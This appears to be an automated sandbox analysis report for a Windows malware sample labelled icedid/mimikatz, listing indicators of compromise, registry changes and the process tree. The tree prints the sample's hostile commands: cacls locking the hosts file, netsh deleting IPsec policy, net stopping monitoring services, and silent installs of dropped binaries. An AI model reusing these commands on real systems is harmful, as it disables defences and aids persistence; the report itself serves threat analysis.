netsh.exesc.exetsgwibn.execmd.exenet.exenet.exeschtasks.exenetsh.exenet.exesc.execmd.execmd.exenet.execmd.execmd.execmd.execmd.execacls.exetsgwibn.execmd.exenetsh.exenet.execmd.execmd.execmd.execmd.execmd.exenetsh.exewvwuinghb.execmd.exewpcap.exenetsh.exenetsh.execmd.execacls.exenet1.exenetsh.execmd.execacls.exenet1.execmd.exePING.EXEuzurgcimy.exeschtasks.exenet.exenet.exenetsh.execmd.execacls.exexohudmc.exenet1.exenet1.exenet1.exesc.exenetsh.execmd.exenet1.exeascsoo.execacls.exenetsh.exenetsh.execmd.exe2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tsgwibn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tsgwibn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wvwuinghb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uzurgcimy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ascsoo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 3444 cmd.exe 4372 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\guiyywyg\tsgwibn.exe nsis_installer_2 C:\Windows\vguwtuflb\imnwwtqyn\wpcap.exe nsis_installer_1 C:\Windows\vguwtuflb\imnwwtqyn\wpcap.exe nsis_installer_2 -
Modifies data under HKEY_USERS 47 IoCs
Processes:
cumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.exetsgwibn.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" tsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" tsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" tsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ tsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" tsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe -
Modifies registry class 14 IoCs
Processes:
tsgwibn.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ tsgwibn.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 4672 schtasks.exe 3284 schtasks.exe 5108 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
tsgwibn.exepid process 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 656 656 656 656 656 656 656 656 656 656 656 656 656 656 656 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exepid process 2596 2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exetsgwibn.exetsgwibn.exevfshost.execumgbbwyg.exewerigg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.exedescription pid process Token: SeDebugPrivilege 2596 2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4084 tsgwibn.exe Token: SeDebugPrivilege 3396 tsgwibn.exe Token: SeDebugPrivilege 4704 vfshost.exe Token: SeDebugPrivilege 3448 cumgbbwyg.exe Token: SeLockMemoryPrivilege 4136 werigg.exe Token: SeLockMemoryPrivilege 4136 werigg.exe Token: SeDebugPrivilege 2576 cumgbbwyg.exe Token: SeDebugPrivilege 3280 cumgbbwyg.exe Token: SeDebugPrivilege 4848 cumgbbwyg.exe Token: SeDebugPrivilege 3328 cumgbbwyg.exe Token: SeDebugPrivilege 1848 cumgbbwyg.exe Token: SeDebugPrivilege 4056 cumgbbwyg.exe Token: SeDebugPrivilege 1264 cumgbbwyg.exe Token: SeDebugPrivilege 4496 cumgbbwyg.exe Token: SeDebugPrivilege 3836 cumgbbwyg.exe Token: SeDebugPrivilege 3812 cumgbbwyg.exe Token: SeDebugPrivilege 3992 cumgbbwyg.exe Token: SeDebugPrivilege 3620 cumgbbwyg.exe Token: SeDebugPrivilege 2628 cumgbbwyg.exe Token: SeDebugPrivilege 3028 cumgbbwyg.exe Token: SeDebugPrivilege 4448 cumgbbwyg.exe Token: SeDebugPrivilege 4696 cumgbbwyg.exe Token: SeDebugPrivilege 2204 cumgbbwyg.exe Token: SeDebugPrivilege 1720 cumgbbwyg.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exetsgwibn.exetsgwibn.exexohudmc.exeascsoo.exetsgwibn.exetsgwibn.exepid process 2596 2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe 2596 2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe 4084 tsgwibn.exe 4084 tsgwibn.exe 3396 tsgwibn.exe 3396 tsgwibn.exe 1568 xohudmc.exe 2540 ascsoo.exe 4432 tsgwibn.exe 4432 tsgwibn.exe 6804 tsgwibn.exe 6804 tsgwibn.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.execmd.exetsgwibn.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 2596 wrote to memory of 3444 2596 2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe cmd.exe PID 2596 wrote to memory of 3444 2596 2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe cmd.exe PID 2596 wrote to memory of 3444 2596 2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe cmd.exe PID 3444 wrote to memory of 4372 3444 cmd.exe PING.EXE PID 3444 wrote to memory of 4372 3444 cmd.exe PING.EXE PID 3444 wrote to memory of 4372 3444 cmd.exe PING.EXE PID 3444 wrote to memory of 4084 3444 cmd.exe tsgwibn.exe PID 3444 wrote to memory of 4084 3444 cmd.exe tsgwibn.exe PID 3444 wrote to memory of 4084 3444 cmd.exe tsgwibn.exe PID 3396 wrote to memory of 1856 3396 tsgwibn.exe cmd.exe PID 3396 wrote to memory of 1856 3396 tsgwibn.exe cmd.exe PID 3396 wrote to memory of 1856 3396 tsgwibn.exe cmd.exe PID 1856 wrote to memory of 2020 1856 cmd.exe cmd.exe PID 1856 wrote to memory of 2020 1856 cmd.exe cmd.exe PID 1856 wrote to memory of 2020 1856 cmd.exe cmd.exe PID 1856 wrote to memory of 4080 1856 cmd.exe cacls.exe PID 1856 wrote to memory of 4080 1856 cmd.exe cacls.exe PID 1856 wrote to memory of 4080 1856 cmd.exe cacls.exe PID 1856 wrote to memory of 4272 1856 cmd.exe cmd.exe PID 1856 wrote to memory of 4272 1856 cmd.exe cmd.exe PID 1856 wrote to memory of 4272 1856 cmd.exe cmd.exe PID 1856 wrote to memory of 4368 1856 cmd.exe cacls.exe PID 1856 wrote to memory of 4368 1856 cmd.exe cacls.exe PID 1856 wrote to memory of 4368 1856 cmd.exe cacls.exe PID 1856 wrote to memory of 3492 1856 cmd.exe cmd.exe PID 1856 wrote to memory of 3492 1856 cmd.exe cmd.exe PID 1856 wrote to memory of 3492 1856 cmd.exe cmd.exe PID 1856 wrote to memory of 3540 1856 cmd.exe cacls.exe PID 1856 wrote to memory of 3540 1856 cmd.exe cacls.exe PID 1856 wrote to memory of 3540 1856 cmd.exe cacls.exe PID 3396 wrote to memory of 2144 3396 tsgwibn.exe netsh.exe PID 3396 wrote to memory of 2144 3396 tsgwibn.exe netsh.exe PID 3396 wrote to memory of 2144 3396 tsgwibn.exe netsh.exe PID 3396 wrote to memory of 4540 3396 tsgwibn.exe netsh.exe PID 3396 wrote to memory of 4540 3396 tsgwibn.exe netsh.exe PID 3396 wrote to memory of 4540 3396 tsgwibn.exe netsh.exe PID 3396 wrote to memory of 3236 3396 tsgwibn.exe netsh.exe PID 3396 wrote to memory of 3236 3396 tsgwibn.exe netsh.exe PID 3396 wrote to memory of 3236 3396 tsgwibn.exe netsh.exe PID 3396 wrote to memory of 5064 3396 tsgwibn.exe cmd.exe PID 3396 wrote to memory of 5064 3396 tsgwibn.exe cmd.exe PID 3396 wrote to memory of 5064 3396 tsgwibn.exe cmd.exe PID 5064 wrote to memory of 1452 5064 cmd.exe wpcap.exe PID 5064 wrote to memory of 1452 5064 cmd.exe wpcap.exe PID 5064 wrote to memory of 1452 5064 cmd.exe wpcap.exe PID 1452 wrote to memory of 4476 1452 wpcap.exe net.exe PID 1452 wrote to memory of 4476 1452 wpcap.exe net.exe PID 1452 wrote to memory of 4476 1452 wpcap.exe net.exe PID 4476 wrote to memory of 1560 4476 net.exe net1.exe PID 4476 wrote to memory of 1560 4476 net.exe net1.exe PID 4476 wrote to memory of 1560 4476 net.exe net1.exe PID 1452 wrote to memory of 2256 1452 wpcap.exe net.exe PID 1452 wrote to memory of 2256 1452 wpcap.exe net.exe PID 1452 wrote to memory of 2256 1452 wpcap.exe net.exe PID 2256 wrote to memory of 4672 2256 net.exe net1.exe PID 2256 wrote to memory of 4672 2256 net.exe net1.exe PID 2256 wrote to memory of 4672 2256 net.exe net1.exe PID 1452 wrote to memory of 2520 1452 wpcap.exe net.exe PID 1452 wrote to memory of 2520 1452 wpcap.exe net.exe PID 1452 wrote to memory of 2520 1452 wpcap.exe net.exe PID 2520 wrote to memory of 1736 2520 net.exe net1.exe PID 2520 wrote to memory of 1736 2520 net.exe net1.exe PID 2520 wrote to memory of 1736 2520 net.exe net1.exe PID 1452 wrote to memory of 4808 1452 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2152
-
C:\Windows\TEMP\sbymbrggy\werigg.exe"C:\Windows\TEMP\sbymbrggy\werigg.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\guiyywyg\tsgwibn.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4372
-
-
C:\Windows\guiyywyg\tsgwibn.exeC:\Windows\guiyywyg\tsgwibn.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4084
-
-
-
C:\Windows\guiyywyg\tsgwibn.exeC:\Windows\guiyywyg\tsgwibn.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2020
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4272
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3492
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3540
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2144
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4540
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3236
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vguwtuflb\imnwwtqyn\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\vguwtuflb\imnwwtqyn\wpcap.exeC:\Windows\vguwtuflb\imnwwtqyn\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1560
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4672
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1736
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4808
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3100
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
